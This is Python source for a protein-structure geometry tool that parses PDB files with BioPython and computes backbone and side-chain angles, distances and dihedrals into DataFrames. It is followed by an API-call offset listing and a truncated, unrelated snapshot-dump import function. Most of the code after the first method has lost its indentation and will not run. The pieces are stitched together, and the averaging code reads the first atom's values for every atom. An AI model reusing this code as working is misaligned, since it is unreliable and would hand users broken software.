        ``self.hetatms`` (other hetero groups) with GeoAtom objects, applies
        the disordered/occupancy/badAtoms filters, attaches density values
        when available, and computes the average CA b-factor plus each atom's
        bfactorRatio.  Downloads the pdb on a first-pass parse failure
        (unless the path is an '_ADJ' adjusted directory).  Sets and returns
        ``self.hasPDB``.
        """
        # try:
        bfactorCount = 0
        bfactorTotal = 0
        if True:
            import Bio.PDB as bio
            self.hasPDB = True
            pdbCode = self.pdbCode.lower()
            #print('PSU: load from BioPython', self.pdbCode)
            parser = bio.PDBParser()
            biodl = bio.PDBList()
            structure = None
            gotPdb = False
            # First try the local file; on failure download it and retry
            # (with a second, longer-delayed retry for slow filesystems).
            try:
                #print('debug get pdb from',self.pdbDataPath + 'pdb' + pdbCode + '.ent')
                structure = parser.get_structure(pdbCode, self.pdbDataPath + 'pdb' + pdbCode + '.ent')
                gotPdb = True
            except:
                if '_ADJ' not in self.pdbDataPath:#never download the pdb to an adjusted directory
                    import time
                    #print('!!! Downloading from pdb: ',self.pdbDataPath,pdbCode)
                    biodl.download_pdb_files([pdbCode], pdir=self.pdbDataPath, file_format='pdb')
                    time.sleep(1)
                    try:
                        structure = parser.get_structure(pdbCode, self.pdbDataPath + 'pdb' + pdbCode + '.ent')
                        gotPdb = True
                    except:
                        import time
                        time.sleep(10)
                        structure = parser.get_structure(pdbCode, self.pdbDataPath + 'pdb' + pdbCode + '.ent')
                        gotPdb = True
            if gotPdb:
                resolution = structure.header['resolution']
                atomNo = 0
                resnum = 1
                for model in structure:
                    for chain in model:
                        for residue in chain:
                            r = residue.get_resname()
                            # print('Residue:', r)
                            rid = residue.get_full_id()[3][1]
                            # NOTE(review): this rebinds the loop variable
                            # 'chain' (a Chain object) to its id string.
                            chain = residue.get_full_id()[2]
                            hetatm = residue.get_full_id()[3][0]
                            ridx = resnum
                            resnum = resnum+1
                            #decision as to whether r is to be used. for density maps yes, for geoemtry no
                            #print(residue.get_full_id())
                            #print(r,hetatm)
                            if (r in self.getAAList() and 'H' not in hetatm) or self.useAll:# and r!='HOH'):# != 'HOH': # bio.is_aa(residue):
                                for atom in residue:
                                    disordered = 'N'
                                    useAtom = True
                                    # Disordered atoms: keep conformer 'A' when
                                    # requested, otherwise drop the atom.
                                    if atom.is_disordered():
                                        disordered = 'Y'
                                        if self.keepDisordered:
                                            if atom.disordered_has_id("A"):
                                                atom.disordered_select("A")
                                            else:
                                                useAtom = False
                                    # When not keeping disordered atoms, also
                                    # drop anything with partial occupancy.
                                    if not self.keepDisordered and useAtom:
                                        if atom.get_occupancy() < 1:
                                            useAtom = False
                                            #print('debug not passed disordered', atom,atom.get_occupancy())
                                    # Exclude explicitly black-listed atom ids.
                                    if useAtom:
                                        atomID=atom.get_full_id()[0] +chain + str(rid) +atom.get_name()
                                        if atomID in self.badAtoms:
                                            #print(atomID)
                                            useAtom = False
                                    if useAtom:
                                        oneAtom = atm.GeoAtom()
                                        oneAtom.setStructureInfo(pdbCode, resolution)
                                        oneAtom.setResidueInfo(chain, rid, ridx,r)
                                        atomNo += 1
                                        name = atom.get_name()
                                        occupant = atom.get_full_id()[4][1]
                                        if occupant == ' ':
                                            occupant = 'A'
                                        x = atom.get_vector()[0]
                                        y = atom.get_vector()[1]
                                        z = atom.get_vector()[2]
                                        bfactor = atom.get_bfactor()
                                        # Average b-factor is taken over CA atoms only.
                                        if name == 'CA':
                                            bfactorCount += 1
                                            bfactorTotal += bfactor
                                        occupancy = atom.get_occupancy()
                                        oneAtom.setAtomInfo(r,name, atomNo, x, y, z, bfactor, occupant, occupancy,disordered)
                                        #if rid < 3:
                                        #    print(oneAtom)
                                        # add density if we can
                                        if self.hasDensity:
                                            tFoFc, FoFc, Fo, Fc = self.geoDen.getDensityXYZ(x, y, z)
                                            oneAtom.setDensityInfo(tFoFc, FoFc, Fo, Fc)
                                        # print('Atom:',atomNo)
                                        # Route the atom to the matching list.
                                        if r in self.getAAList():
                                            self.atoms.append(oneAtom)
                                        elif r == 'HOH':
                                            self.water.append(oneAtom)
                                        else:
                                            self.hetatms.append(oneAtom)
                if bfactorCount > 0:
                    self.averageBfactor = bfactorTotal/bfactorCount
                    # Now set the bFactorRatio for all atoms
                    for atom in self.atoms:
                        try:
                            atom.values['bfactorRatio'] = atom.values['bfactor'] / self.averageBfactor
                        except:
                            atom.values['bfactorRatio'] = 0
                else:
                    self.averageBfactor = 0
                #print('PSU: loaded successfully from BioPython', self.pdbCode)
                self.hasPDB = True
            else:
                #print('!!! PSU: failed to load', self.pdbCode, 'from',self.pdbDataPath)
                self.hasPDB = False
        # except:
        #     self.hasPDB = False
        return (self.hasPDB)
def __applyDssp(self):
import Bio.PDB as bio
print('PSU: applying dssp')
from Bio.PDB.DSSP import DSSP
p = bio.PDBParser()
pdbFile = self.pdbDataPath + 'pdb' + self.pdbCode + '.ent'
structure = p.get_structure(self.pdbCode, pdbFile)
model = structure[0]
dssp = DSSP(model, pdbFile)
for akey in list(dssp.keys()):
chain = akey[0]
res_no = akey[1][1]
row = dssp[akey]
ss = row[2]
for atom in self.atoms:
if atom.values['rid'] == res_no and atom.values['chain'] == chain:
atom.setDsspInfo(ss)
print('PSU: applied dssp successfully')
def getStructureDensity(self,allPoints,divisor,pdbDataPath,edDataPath):
if self.hasDensity:
if self.densCSV.empty:
self.geoDen = den.GeoDensity(self.pdbCode,'fifty',pdbDataPath,edDataPath)
self.densCSV = self.geoDen.getPeaks(allPoints,divisor)
return self.densCSV
def getGeoemtryCsv(self,geoListEntered, hues,bfactorFactor = -1,restrictedAa = 'ALL'):
#print('PSU Geometry csv for - ', self.pdbCode)
# geo in format C-1, C+1, C
#print('PSU: creating geometry dataframe')
dics = []
usingAliases = False
# remove anything that is in anyway
if 'rid' in hues:
hues.remove('rid')
if 'pdbCode' in hues:
hues.remove('pdbCode')
if 'chain' in hues:
hues.remove('chain')
geoList = []
geoListIn = []
#print('geos', geoListEntered)
for geoa in geoListEntered:
for aa in self.getAAList():
geo = self.aliasToGeo(geoa,aa)
if geo != geoa:
usingAliases = True
#print(geoa,geo,aa,usingAliases)
if ':' not in geo:
if geo not in hues:
hues.append(geo)
else:
if geo not in geoList:
geoList.append(geo)
if geoa not in geoListIn:
geoListIn.append(geoa)
if len(geoList)<2:
geoList.append('N:CA')
geoList.append('CA:C')
if len(geoListIn)<2:
geoListIn.append('N:CA')
geoListIn.append('CA:C')
if 'aa' not in hues:
hues.append('aa')
if 'ridx' not in hues:
hues.append('ridx')
if 'atomNo' not in hues:
hues.append('atomNo')
if 'bfactor' not in hues:
hues.append('bfactor')
occList = ['A']#self.__getOccList()
ridList = self.__getRidList()
chainList = self.__getChainList()
rows = len(ridList)
chrows = len(chainList)
occs = len(occList)
#an atom will be uniquely defined by rid, chain, occupant
# set up the geoData to which we concatenate first
#geoData = pd.DataFrame(columns=('pdbCode', 'chain', 'rid'))
#for hue in hues:
# geoData[hue] = np.nan
#for geo in geoListIn: #the column names will be the alias names or whatever we passed in AND the aliases
# geoData[geo] = np.nan
#for geo in geoList: #the column names will be the alias names or whatever we passed in AND the aliases
# geoData[geo] = np.nan
for ch in range(0, chrows):
thisChain = chainList[ch]
for occ in range(0,occs):
thisOcc = occList[occ]
thisOcc = occList[occ]
for rid in range(0, rows):
thisResid = ridList[rid]
thisResidue = self.__getResidue(thisChain, thisResid,thisOcc)# not really a residue but it does for getting aa
if thisResidue == None:
#print(thisChain,thisResid,thisOcc)
a = 2
elif restrictedAa != 'ALL' and restrictedAa != thisResidue.values['aa']:
#print('Skipping', thisResidue, restrictedAa)
a = 2
elif bfactorFactor != -1 and self.__getResidueBFactor(thisChain, thisResid,thisOcc) > self.averageBfactor * bfactorFactor:
# print(thisChain,thisResid,thisOcc)
a = 2
else:
allValid = True
aa = thisResidue.values['aa']
listCalcs = []
for geoa in geoListIn:
geo = self.aliasToGeo(geoa,aa)
geos = geo.split(':')
geoPairs = self.__geosToPairs(geos)
datasA = []
firstAtom = ''
for a in range(0, len(geoPairs)):
geoPair = geoPairs[a]
geoAtom = geoPair[0]
if firstAtom == '':
firstAtom = geoAtom
ridA = thisResid + geoPairs[a][1] # add the offset
atomA = self.__getAtom(thisChain, ridA,thisOcc,geoAtom)
if geoAtom == 'HOH':
atomA = self.__getWaterAtom(thisChain, ridA, thisOcc, firstAtom)
elif geoAtom == 'HETATM':
atomA = self.__getHetAtom(thisChain, ridA, thisOcc, firstAtom)
elif '{' in geoAtom and '}' in geoAtom:
atomA = self.__getNearestAtom(thisChain, ridA, thisOcc, firstAtom,geoAtom)
#elif '*' in geoAtom and '*' in geoAtom:
# atomA = self.__getNumberAtom(thisChain, ridA, thisOcc, firstAtom,geoAtom)
# There should be 1 atom
if atomA != None:
datasA.append(atomA)
else:
allValid = False
listCalcs.append([datasA,geo])
if allValid:
#add a new row to the dataframe
#df1 = pd.DataFrame([[np.nan] * len(geoData.columns)], columns=geoData.columns)
#geoData = df1.append(geoData, ignore_index=True)
thisRow = 0#len(geoData)-1
#geoData.loc[thisRow, 'pdbCode'] = self.pdbCode
#geoData.loc[thisRow, 'chain'] = thisChain
#geoData.loc[thisRow, 'rid'] = int(thisResid)
dic = {}
dic['pdbCode'] = self.pdbCode
dic['chain'] = thisChain
dic['rid'] = int(thisResid)
# add the main data to the data frame
reshues = {}
for hue in hues:
reshues[hue] = ''
for oneGeo in listCalcs:
datasA = oneGeo[0]
geo = oneGeo[1]
geoatoms = geo.split(':')
geoPairs = self.__geosToPairs([geoatoms])
gpCount = 0
for gp in geoPairs:
offset = geoPairs[0][1]
if offset == 0:
for hue in hues:
oneHue = datasA[gpCount].values[hue]
if reshues[hue] == '':
try:
float(oneHue)
reshues[hue] = 0
except:
reshues[hue] = oneHue
if len(datasA) == 4: # dihedral
valA = calcs.torsion(datasA[0].values['x'], datasA[0].values['y'], datasA[0].values['z'],
datasA[1].values['x'], datasA[1].values['y'], datasA[1].values['z'],
datasA[2].values['x'], datasA[2].values['y'], datasA[2].values['z'],
datasA[3].values['x'], datasA[3].values['y'], datasA[3].values['z'])
motif = datasA[0].values['residue']+datasA[1].values['residue']+datasA[2].values['residue']+datasA[3].values['residue']
avbf = (datasA[0].values['bfactor'] + datasA[1].values['bfactor'] + datasA[2].values['bfactor']+ datasA[3].values['bfactor']) / 4
ridmotif = str(datasA[0].values['rid']) + '_' + str(datasA[1].values['rid']) + '_' + str(datasA[2].values['rid']) + '_' + str(datasA[3].values['rid'])
atmmotif = str(datasA[0].values['atom']) + '_' + str(datasA[1].values['atom']) + '_' + str(datasA[2].values['atom']) + '_' + str(datasA[3].values['atom'])
for hue in hues:
aHue = datasA[0].values[hue]
bHue = datasA[0].values[hue]
cHue = datasA[0].values[hue]
dHue = datasA[0].values[hue]
try:
float(aHue)
thisHue = (aHue + bHue + cHue + dHue)/4
reshues[hue] += thisHue
if reshues[hue] != thisHue:
reshues[hue] = reshues[hue]/2 # we want the average of all the atoms in the calculation
except:
reshues[hue] =reshues[hue]
elif len(datasA) == 3: # angle
valA = calcs.angle(datasA[0].values['x'], datasA[0].values['y'], datasA[0].values['z'],
datasA[1].values['x'], datasA[1].values['y'], datasA[1].values['z'],
datasA[2].values['x'], datasA[2].values['y'], datasA[2].values['z'])
motif = datasA[0].values['residue'] + datasA[1].values['residue'] + datasA[2].values['residue']
avbf = (datasA[0].values['bfactor'] + datasA[1].values['bfactor']+ datasA[2].values['bfactor']) / 3
ridmotif = str(datasA[0].values['rid']) + '_' + str(datasA[1].values['rid']) + '_' + str(datasA[2].values['rid'])
atmmotif = str(datasA[0].values['atom']) + '_' + str(datasA[1].values['atom']) + '_' + str(datasA[2].values['atom'])
for hue in hues:
aHue = datasA[0].values[hue]
bHue = datasA[0].values[hue]
cHue = datasA[0].values[hue]
try:
float(aHue)
thisHue = (aHue + bHue + cHue)/3
reshues[hue] += thisHue
if reshues[hue] != thisHue:
reshues[hue] = reshues[hue]/2 # we want the average of all the atoms in the calculation
except:
reshues[hue] =reshues[hue]
elif len(datasA) == 2: # distance
valA = calcs.distance(datasA[0].values['x'], datasA[0].values['y'], datasA[0].values['z'],
datasA[1].values['x'], datasA[1].values['y'], datasA[1].values['z'])
motif = datasA[0].values['residue'] + datasA[1].values['residue']
avbf = (datasA[0].values['bfactor'] + datasA[1].values['bfactor'])/2
ridmotif = str(datasA[0].values['rid']) + "_" + str(datasA[1].values['rid'])
atmmotif = str(datasA[0].values['atom']) + "_" + str(datasA[1].values['atom'])
for hue in hues:
aHue = datasA[0].values[hue]
bHue = datasA[0].values[hue]
try:
float(aHue)
thisHue = (aHue + bHue)/2
reshues[hue] += thisHue
if reshues[hue] != thisHue:
reshues[hue] = reshues[hue]/2 # we want the average of all the atoms in the calculation
except:
reshues[hue] =reshues[hue]
else: # just some data
print('??',datasA)
#geoData.loc[thisRow, geo] = valA
dic[geo] = valA
dic[geo+'_motif'] = motif
dic[geo + '_avbfactor'] = avbf
dic[geo + '_ridmotif'] = ridmotif
dic[geo + '_atmmotif'] = atmmotif
# hue could be an average or an
for hue in hues:
#geoData.loc[thisRow, hue] = reshues[hue]
dic[hue] = reshues[hue]
dic['aa'] = aa
#print(usingAliases)
if usingAliases:
#aa = geoData['aa'][0]
geoa = self.geoToAlias(geo,aa)
#print(geoa,geo,aa)
if geoa != geo:
#geoData.loc[thisRow, geoa] = valA # we have alias and geo column
dic[geoa] = valA
dics.append(dic)
dataFrame = pd.DataFrame.from_dict(dics)
return dataFrame
def __getAtomsRid(self,rid,atoms):
newAtoms = []
for atm in atoms:
if atm.values['rid'] == rid:
newAtoms.append(atm)
return(newAtoms)
def __getAtomsChain(self, chain,atoms):
newAtoms = []
for atm in atoms:
if atm.values['chain'] == chain:# and atm.values['aa'] == aa:
newAtoms.append(atm)
return (newAtoms)
def __getAtomsOccupant(self, occ,atoms):
newAtoms = []
for atm in atoms:
if atm.values['occupant'] == occ:
newAtoms.append(atm)
return (newAtoms)
def __getAtomsAtom(self, atom,atoms):
newAtoms = []
for atm in atoms:
if atm.values['atom'] == atom:
newAtoms.append(atm)
return (newAtoms)
def __getResidue(self, chain, rid, occ):
for atm in self.atoms:
if atm.values['chain'] == chain and atm.values['rid'] == rid and atm.values['occupant'] == occ:
return atm
return None
def __getAtom(self, chain, rid, occ,atom):
# The atom number cannot be less than 1
if rid < 1:
return None
#it could be HOH ar HETATM
for atm in self.atoms:
if atm.values['chain'] == chain and atm.values['rid'] == rid and atm.values['occupant'] == occ and atm.values['atom'] == atom:
return atm
return None
def __getWaterAtom(self, chain, rid, occ,atom):
# The atom number cannot be less than 1
atm = self.__getAtom(chain, rid, occ,atom)
if atm == None:
return None
water = atm #return itself if there are none
dis = 1000
for hoh in self.water:
valDis = calcs.distance(atm.values['x'], atm.values['y'], atm.values['z'],
hoh.values['x'], hoh.values['y'], hoh.values['z'])
if valDis < dis:
dis = valDis
water = hoh
return water
def __getHetAtom(self, chain, rid, occ,atom):
# The atom number cannot be less than 1
atm = self.__getAtom(chain, rid, occ,atom)
if atm == None:
return None
hetatm = atm #return itself if there are none
dis = 1000
for het in self.hetatms:
valDis = calcs.distance(atm.values['x'], atm.values['y'], atm.values['z'],
het.values['x'], het.values['y'], het.values['z'])
if valDis < dis:
dis = valDis
hetatm = het
return hetatm
def __getNearestAtom(self, chain, rid, occ,atom,newatom):
# The atom number cannot be less than 1
atm = self.__getAtom(chain, rid, occ,atom)
if atm == None:
return None
nearatm = atm #return itself if there are none
dis = 1000
for at in self.atoms:
#print("," + at.values['atom'] + ",", newatom)
if "," + at.values['atom'] + "," in newatom and at.values['rid'] != rid and at.values['rid'] != rid-1 and at.values['rid'] != rid+1: #could pass in a list of atoms to look for in the case of oxygen sidechains
#print("," + at.values['atom'] + ",", newatom)
valDis = calcs.distance(atm.values['x'], atm.values['y'], atm.values['z'], at.values['x'], at.values['y'], at.values['z'])
if valDis < dis:
dis = valDis
nearatm = at
if ",HOH," in newatom:
for hoh in self.water:
valDis = calcs.distance(atm.values['x'], atm.values['y'], atm.values['z'], hoh.values['x'], hoh.values['y'], hoh.values['z'])
if valDis < dis:
dis = valDis
nearatm = hoh
if ",HETATM," in newatom:
for het in self.hetatms:
valDis = calcs.distance(atm.values['x'], atm.values['y'], atm.values['z'], het.values['x'], het.values['y'], het.values['z'])
if valDis < dis:
dis = valDis
nearatm = het
return nearatm
def __getNumberAtom(self, chain, rid, occ,atom,newatom):
# The atom number cannot be less than 1
atm = self.__getAtom(chain, rid, occ,atom)
if atm == None:
return None
nearatm = atm #return itself if there are none
dis = 4
count = 0
for at in self.atoms:
#print("," + at.values['atom'] + ",", newatom)
if "," + at.values['atom'] + "," in newatom and at.values['rid'] != rid and at.values['rid'] != rid-1 and at.values['rid'] != rid+1: #could pass in a list of atoms to look for in the case of oxygen sidechains
#print("," + at.values['atom'] + ",", newatom)
valDis = calcs.distance(atm.values['x'], atm.values['y'], atm.values['z'], at.values['x'], at.values['y'], at.values['z'])
if valDis < dis:
count +=1
if ",HOH," in newatom:
for hoh in self.water:
valDis = calcs.distance(atm.values['x'], atm.values['y'], atm.values['z'], hoh.values['x'], hoh.values['y'], hoh.values['z'])
if valDis < dis:
count +=1
if ",HETATM," in newatom:
for het in self.hetatms:
valDis = calcs.distance(atm.values['x'], atm.values['y'], atm.values['z'], het.values['x'], het.values['y'], het.values['z'])
if valDis < dis:
count += 1
return count
def __getResidueBFactor(self, chain, rid, occ):
# The atom number cannot be less than 1
for atm in self.atoms:
if atm.values['chain'] == chain and atm.values['rid'] == rid and atm.values['occupant'] == occ and atm.values['atom'] == 'CA':
return atm.values['bfactor']
return 0
def __getChainsUnique(self, atoms):
chains = []
for atm in atoms:
if atm.values['chain'] not in chains:
chains.append(atm.values['chain'])
return (chains)
def __getChainList(self):
chains = []
for atm in self.atoms:
if atm.values['chain'] not in chains:
chains.append(atm.values['chain'])
return (chains)
def __getRidList(self):
rids = []
for atm in self.atoms:
if atm.values['rid'] not in rids:
rids.append(atm.values['rid'])
return (rids)
def __getOccList(self):
occs = []
for atm in self.atoms:
if atm.values['occupant'] not in occs:
occs.append(atm.values['occupant'])
return (occs)
def __getRidUnique(self, atoms):
vals = []
for atm in atoms:
if atm.values['rid'] not in vals:
vals.append(atm.values['rid'])
print(vals)
return (vals)
def __geosToPairs(self,geos):
# geoX in format C-1, C+1, C
pairs = []
for geo in geos:
atomX = ''
offX = ''
pm = 0
for alpha in geo:
if alpha == '-':
pm = -1
elif alpha == '+':
pm = 1
elif pm == 0:
atomX += alpha
else: # it is a number offset
offX += alpha
if pm != 0:
offX = pm * int(offX)
else:
offX = 0
pairs.append([atomX, offX])
return (pairs)
def aliasToGeo(self,alias,aa):
dic = self.getAliasDictionary()
if alias + '_' + aa in dic:
return dic[alias+'_'+aa]
elif alias in dic:
return dic[alias]
else:
return alias
def geoToAlias(self,geo,aa):
dic = self.getAliasDictionary()
for a,g in dic.items():
if aa in a and g == geo:
if '_' in a:
return a.split('_')[0]
else:
return a
for a,g in dic.items():
if g==geo:
return a
return geo
def getAliasDictionary(self):
return {
'PHI':'C-1:N:CA:C',
'PSI':'N:CA:C:N+1',
'OMEGA': 'CA:C:N+1:CA+1',
'PREOMEGA': 'CA-1:C-1:N:CA',
'TAU':'N:CA:C',
'TAU-1': 'C-1:N:CA',
'TAU+1': 'CA:C:N+1',
'CHI1':'N:CA:CB:CG',
'CHI1_ILE':'N:CA:CB:CG1',
'CHI1_SER': 'N:CA:CB:OG',
'CHI1_THR': 'N:CA:CB:OG1',
'CHI1_VAL': 'N:CA:CB:CG1',
'CHI1_ALA': 'N:CA:CB:HB1',
'CHI2': 'CA:CB:CG:CD',
'CHI2_ASN': 'CA:CB:CG:OD1',
'CHI2_ASP': 'CA:CB:CG:OD1',
'CHI2_HIS': 'CA:CB:CG:ND1',
'CHI2_ILE': 'CA:CB:CG1:CD',
'CHI2_LEU': 'CA:CB:CG:CD1',
'CHI2_MET': 'CA:CB:CG:SD',
'CHI2_PHE': 'CA:CB:CG:CD1',
'CHI2_TRP': 'CA:CB:CG:CD1',
'CHI2_TYR': 'CA:CB:CG:CD1',
'CHI2_VAL': 'CA:CB:CG1:HG11',
'CHI2_THR': 'CA:CB:CG2:HG21',
'CHI3':'CB:CG:CD:CE',
'CHI3_ARG': 'CB:CG:CD:NE',
'CHI3_GLN': 'CB:CG:CD:OE1',
'CHI3_GLU': 'CB:CG:CD:OE1',
'CHI3_HIS': 'CA:CB:CG:CD2',
'CHI3_MET': 'CB:CG:SD:CE',
'CHI3_PRO': 'CB:CG:CD:N',
'CHI3_VAL': 'CA:CB:CG2:HG21',
'CHI4': 'CG:CD:CE:CZ',
'CHI4_ARG': 'CG:CD:NE:CZ',
'CHI4_PRO': 'CG:CD:N:CA',
'CHI4_LYS': 'CG:CD:CE:NZ',
'CHI5': 'CD:CE:CZ:NH1',
'CHI5_PRO': 'CD:N:CA:CB',
}
def getAAList(self):
return ['ALA','CYS','ASP','GLU','PHE',
'GLY','HIS','ILE','LYS','LEU',
'MET','ASN','PRO','GLN','ARG',
'SER','THR','VAL','TRP','TYR']
| [
"pandas.DataFrame",
"pandas.DataFrame.from_dict",
"Bio.PDB.PDBList",
"Geometry.GeoDensity.GeoDensity",
"Geometry.GeoCalcs.torsion",
"numpy.zeros",
"Bio.PDB.DSSP.DSSP",
"Geometry.GeoCalcs.distance",
"time.sleep",
"Geometry.GeoCalcs.angle",
"Bio.PDB.PDBParser",
"Geometry.GeoAtom.GeoAtom"
] | [((2699, 2713), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (2711, 2713), True, 'import pandas as pd\n'), ((2767, 2781), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (2779, 2781), True, 'import pandas as pd\n'), ((4612, 4642), 'pandas.DataFrame.from_dict', 'pd.DataFrame.from_dict', (['dicdfs'], {}), '(dicdfs)\n', (4634, 4642), True, 'import pandas as pd\n'), ((4993, 5009), 'numpy.zeros', 'np.zeros', (['(x, y)'], {}), '((x, y))\n', (5001, 5009), True, 'import numpy as np\n'), ((12357, 12372), 'Bio.PDB.PDBParser', 'bio.PDBParser', ([], {}), '()\n', (12370, 12372), True, 'import Bio.PDB as bio\n'), ((12543, 12563), 'Bio.PDB.DSSP.DSSP', 'DSSP', (['model', 'pdbFile'], {}), '(model, pdbFile)\n', (12547, 12563), False, 'from Bio.PDB.DSSP import DSSP\n'), ((27482, 27510), 'pandas.DataFrame.from_dict', 'pd.DataFrame.from_dict', (['dics'], {}), '(dics)\n', (27504, 27510), True, 'import pandas as pd\n'), ((5864, 5879), 'Bio.PDB.PDBParser', 'bio.PDBParser', ([], {}), '()\n', (5877, 5879), True, 'import Bio.PDB as bio\n'), ((5900, 5913), 'Bio.PDB.PDBList', 'bio.PDBList', ([], {}), '()\n', (5911, 5913), True, 'import Bio.PDB as bio\n'), ((29309, 29430), 'Geometry.GeoCalcs.distance', 'calcs.distance', (["atm.values['x']", "atm.values['y']", "atm.values['z']", "hoh.values['x']", "hoh.values['y']", "hoh.values['z']"], {}), "(atm.values['x'], atm.values['y'], atm.values['z'], hoh.\n values['x'], hoh.values['y'], hoh.values['z'])\n", (29323, 29430), True, 'import Geometry.GeoCalcs as calcs\n'), ((29895, 30016), 'Geometry.GeoCalcs.distance', 'calcs.distance', (["atm.values['x']", "atm.values['y']", "atm.values['z']", "het.values['x']", "het.values['y']", "het.values['z']"], {}), "(atm.values['x'], atm.values['y'], atm.values['z'], het.\n values['x'], het.values['y'], het.values['z'])\n", (29909, 30016), True, 'import Geometry.GeoCalcs as calcs\n'), ((3216, 3273), 'Geometry.GeoDensity.GeoDensity', 'den.GeoDensity', (['pdbCode', '"""fifty"""', 'pdbDataPath', 
'edDataPath'], {}), "(pdbCode, 'fifty', pdbDataPath, edDataPath)\n", (3230, 3273), True, 'import Geometry.GeoDensity as den\n'), ((13095, 13157), 'Geometry.GeoDensity.GeoDensity', 'den.GeoDensity', (['self.pdbCode', '"""fifty"""', 'pdbDataPath', 'edDataPath'], {}), "(self.pdbCode, 'fifty', pdbDataPath, edDataPath)\n", (13109, 13157), True, 'import Geometry.GeoDensity as den\n'), ((30841, 30959), 'Geometry.GeoCalcs.distance', 'calcs.distance', (["atm.values['x']", "atm.values['y']", "atm.values['z']", "at.values['x']", "at.values['y']", "at.values['z']"], {}), "(atm.values['x'], atm.values['y'], atm.values['z'], at.values\n ['x'], at.values['y'], at.values['z'])\n", (30855, 30959), True, 'import Geometry.GeoCalcs as calcs\n'), ((31146, 31267), 'Geometry.GeoCalcs.distance', 'calcs.distance', (["atm.values['x']", "atm.values['y']", "atm.values['z']", "hoh.values['x']", "hoh.values['y']", "hoh.values['z']"], {}), "(atm.values['x'], atm.values['y'], atm.values['z'], hoh.\n values['x'], hoh.values['y'], hoh.values['z'])\n", (31160, 31267), True, 'import Geometry.GeoCalcs as calcs\n'), ((31460, 31581), 'Geometry.GeoCalcs.distance', 'calcs.distance', (["atm.values['x']", "atm.values['y']", "atm.values['z']", "het.values['x']", "het.values['y']", "het.values['z']"], {}), "(atm.values['x'], atm.values['y'], atm.values['z'], het.\n values['x'], het.values['y'], het.values['z'])\n", (31474, 31581), True, 'import Geometry.GeoCalcs as calcs\n'), ((32399, 32517), 'Geometry.GeoCalcs.distance', 'calcs.distance', (["atm.values['x']", "atm.values['y']", "atm.values['z']", "at.values['x']", "at.values['y']", "at.values['z']"], {}), "(atm.values['x'], atm.values['y'], atm.values['z'], at.values\n ['x'], at.values['y'], at.values['z'])\n", (32413, 32517), True, 'import Geometry.GeoCalcs as calcs\n'), ((32668, 32789), 'Geometry.GeoCalcs.distance', 'calcs.distance', (["atm.values['x']", "atm.values['y']", "atm.values['z']", "hoh.values['x']", "hoh.values['y']", "hoh.values['z']"], {}), 
"(atm.values['x'], atm.values['y'], atm.values['z'], hoh.\n values['x'], hoh.values['y'], hoh.values['z'])\n", (32682, 32789), True, 'import Geometry.GeoCalcs as calcs\n'), ((32945, 33066), 'Geometry.GeoCalcs.distance', 'calcs.distance', (["atm.values['x']", "atm.values['y']", "atm.values['z']", "het.values['x']", "het.values['y']", "het.values['z']"], {}), "(atm.values['x'], atm.values['y'], atm.values['z'], het.\n values['x'], het.values['y'], het.values['z'])\n", (32959, 33066), True, 'import Geometry.GeoCalcs as calcs\n'), ((6560, 6573), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (6570, 6573), False, 'import time\n'), ((6836, 6850), 'time.sleep', 'time.sleep', (['(10)'], {}), '(10)\n', (6846, 6850), False, 'import time\n'), ((9349, 9362), 'Geometry.GeoAtom.GeoAtom', 'atm.GeoAtom', ([], {}), '()\n', (9360, 9362), True, 'import Geometry.GeoAtom as atm\n'), ((20611, 20920), 'Geometry.GeoCalcs.torsion', 'calcs.torsion', (["datasA[0].values['x']", "datasA[0].values['y']", "datasA[0].values['z']", "datasA[1].values['x']", "datasA[1].values['y']", "datasA[1].values['z']", "datasA[2].values['x']", "datasA[2].values['y']", "datasA[2].values['z']", "datasA[3].values['x']", "datasA[3].values['y']", "datasA[3].values['z']"], {}), "(datasA[0].values['x'], datasA[0].values['y'], datasA[0].\n values['z'], datasA[1].values['x'], datasA[1].values['y'], datasA[1].\n values['z'], datasA[2].values['x'], datasA[2].values['y'], datasA[2].\n values['z'], datasA[3].values['x'], datasA[3].values['y'], datasA[3].\n values['z'])\n", (20624, 20920), True, 'import Geometry.GeoCalcs as calcs\n'), ((22886, 23114), 'Geometry.GeoCalcs.angle', 'calcs.angle', (["datasA[0].values['x']", "datasA[0].values['y']", "datasA[0].values['z']", "datasA[1].values['x']", "datasA[1].values['y']", "datasA[1].values['z']", "datasA[2].values['x']", "datasA[2].values['y']", "datasA[2].values['z']"], {}), "(datasA[0].values['x'], datasA[0].values['y'], datasA[0].values[\n 'z'], datasA[1].values['x'], 
datasA[1].values['y'], datasA[1].values[\n 'z'], datasA[2].values['x'], datasA[2].values['y'], datasA[2].values['z'])\n", (22897, 23114), True, 'import Geometry.GeoCalcs as calcs\n'), ((24736, 24898), 'Geometry.GeoCalcs.distance', 'calcs.distance', (["datasA[0].values['x']", "datasA[0].values['y']", "datasA[0].values['z']", "datasA[1].values['x']", "datasA[1].values['y']", "datasA[1].values['z']"], {}), "(datasA[0].values['x'], datasA[0].values['y'], datasA[0].\n values['z'], datasA[1].values['x'], datasA[1].values['y'], datasA[1].\n values['z'])\n", (24750, 24898), True, 'import Geometry.GeoCalcs as calcs\n')] |
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import os
import pickle
from argparse import ArgumentParser
import numpy as np
import yaml
def import_from_snapshot_dump(streamit, folder: str, npy_name: str, meta_name: str, category: str):
    """Import specified category from snapshot dump file into data service.

    Args:
        streamit (streamit) : Streamit instance.
        folder (str): Folder name of snapshot dump file.
        npy_name (str): Name of .npy file that hold dumped numpy array data.
        meta_name (str): File name of the meta file.
        category (str): Category name to save into database.

    Returns:
        int: Number of instances per tick found in the dump.
    """
    npy_path = os.path.join(folder, npy_name)
    meta_path = os.path.join(folder, meta_name)

    # Read meta file to get names and length of each field.
    # Line 1: comma-separated field names; line 2: matching slot lengths.
    with open(meta_path, "r") as fp:
        field_name_list = [name.strip() for name in fp.readline().split(",")]
        field_length_list = [int(length) for length in fp.readline().split(",")]

    instance_list: np.ndarray = np.load(npy_path)

    # Instance number will be same for numpy backend.
    instance_number = len(instance_list[0])

    for tick in range(len(instance_list)):
        streamit.tick(tick)

        for instance_index in range(instance_number):
            field_dict = {"index": instance_index}

            for field_name, field_length in zip(field_name_list, field_length_list):
                value = instance_list[tick][instance_index][field_name]

                # Scalar slots become plain Python values; multi-slot
                # fields become lists of Python values.
                if field_length == 1:
                    field_dict[field_name] = value.item()
                else:
